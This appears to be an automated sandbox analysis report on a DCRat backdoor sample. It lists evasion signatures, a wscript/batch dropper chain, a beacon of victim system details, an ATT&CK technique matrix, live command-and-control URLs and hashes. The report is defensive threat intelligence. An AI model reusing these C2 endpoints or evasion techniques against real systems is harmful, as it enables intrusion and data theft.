            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597125s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596906s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596797s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596469s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0059A5F4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_005AB8E0
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005BAAA8 FindFirstFileExA,0_2_005BAAA8
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005ADD72 VirtualQuery,GetSystemInfo,0_2_005ADD72
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 3600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599103Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596250Jump to behavior
            Source: 5Ixz5yVfS7.exe, 00000000.00000003.2004636870.0000000002F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Bridgecontainer.exe, 00000005.00000002.4475227298.000000001B9E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTU
            Source: 5Ixz5yVfS7.exe, 00000000.00000003.2004636870.0000000002F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yf
            Source: wscript.exe, 00000002.00000002.2069774074.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeAPI call chain: ExitProcess graph end nodegraph_0-23370
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005B866F
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B753D mov eax, dword ptr fs:[00000030h]0_2_005B753D
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005BB710 GetProcessHeap,0_2_005BB710
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AF063 SetUnhandledExceptionFilter,0_2_005AF063
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005AF22B
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005B866F
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005AEF05
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"Jump to behavior
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"141700","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: erica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"141700","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AED5B cpuid 0_2_005AED5B
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_005AA63C
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_005AD5D4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059ACF5 GetVersionExW,0_2_0059ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Bridgecontainer.exe PID: 5688, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Bridgecontainer.exe PID: 5688, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts2
            Command and Scripting Interpreter
            11
            Scripting
            12
            Process Injection
            1
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            131
            Virtualization/Sandbox Evasion
            LSASS Memory221
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
            Process Injection
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS131
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture12
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Software Packing
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync136
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            5Ixz5yVfS7.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            5Ixz5yVfS7.exe58%VirustotalBrowse
            5Ixz5yVfS7.exe100%AviraVBS/Runner.VPG
            5Ixz5yVfS7.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://f1069581.xsph.ru100%Avira URL Cloudmalware
            http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr100%Avira URL Cloudmalware
            http://f1069581.xsph.ru/100%Avira URL Cloudmalware
            http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            f1069581.xsph.ru
            141.8.192.151
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5otrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://f1069581.xsph.ruBridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EFF000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://f1069581.xsph.ru/Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyrBridgecontainer.exe, 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002BC6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                141.8.192.151
                f1069581.xsph.ruRussian Federation
                35278SPRINTHOSTRUtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1583156
                Start date and time:2025-01-02 05:16:07 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 47s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:5Ixz5yVfS7.exe
                renamed because original name is a hash value
                Original Sample Name:7b4eccf10cc4fa7263646f2fce4d7f8b.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@9/3@1/1
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 59%
                • Number of executed functions: 185
                • Number of non-executed functions: 94
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Bridgecontainer.exe, PID 5688 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                23:17:05API Interceptor14720834x Sleep call for process: Bridgecontainer.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                141.8.192.151updater.exeGet hashmaliciousPanda StealerBrowse
                • f0837288.xsph.ru/collect.php
                updater.exeGet hashmaliciousPanda StealerBrowse
                • f0837288.xsph.ru/collect.php
                ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeGet hashmaliciousAzorultBrowse
                • f0355889.xsph.ru/Panel/index.php
                gOKMPhOLiN.exeGet hashmaliciousPhoenix Miner, ccminerBrowse
                • f0758246.xsph.ru//zima.php?mine=ETC
                DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                • f0719949.xsph.ru/dropbox.exe
                DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                • f0719949.xsph.ru/dropbox.exe
                dropbox.exeGet hashmaliciousUnknownBrowse
                • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                DWG spare parts 455RTMGF Model.exeGet hashmaliciousRemcosBrowse
                • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                NotaFiscal.msiGet hashmaliciousUnknownBrowse
                • f0717271.xsph.ru/serv.php
                Revised sales contract for Crosswear.rtfGet hashmaliciousSnake KeyloggerBrowse
                • f0705964.xsph.ru/mum.exe
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SPRINTHOSTRUrWjaZEKha8.exeGet hashmaliciousDCRatBrowse
                • 141.8.197.42
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                • 185.185.71.170
                aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                vOizfcQSGf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                • 185.185.71.170
                vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                • 185.185.71.170
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                • 185.185.71.170
                No context
                No context
                Process:C:\Users\user\Desktop\5Ixz5yVfS7.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.081704750510667
                Encrypted:false
                SSDEEP:12288:q82QUxESNOxxm8y5MahZvz0sPlgEjhoiXhQVOyYimx6d/FYt5fXyIs7xFPEEB:LU2xxm8eFjhoiRQROImS/7xFPd
                MD5:21879480EBF05FF55A58FC933CB818A4
                SHA1:24E6E72AC0E45DC8B66502CBB154A695BCC6A36E
                SHA-256:3C9BCD2B3DFAEDBB4F5D3A449917AC4A8CEE2F06E6FDAFF5FA2EC9CA6A56AE59
                SHA-512:A055FF6A5CD853761BA3445C7D4DC40528859EB486CBD09AAED87573AC73449CDC9B07C94324B94257F2DE43373BBF1B190B9CE9C242966E9C9F8D6E90F4D61B
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Reputation:low
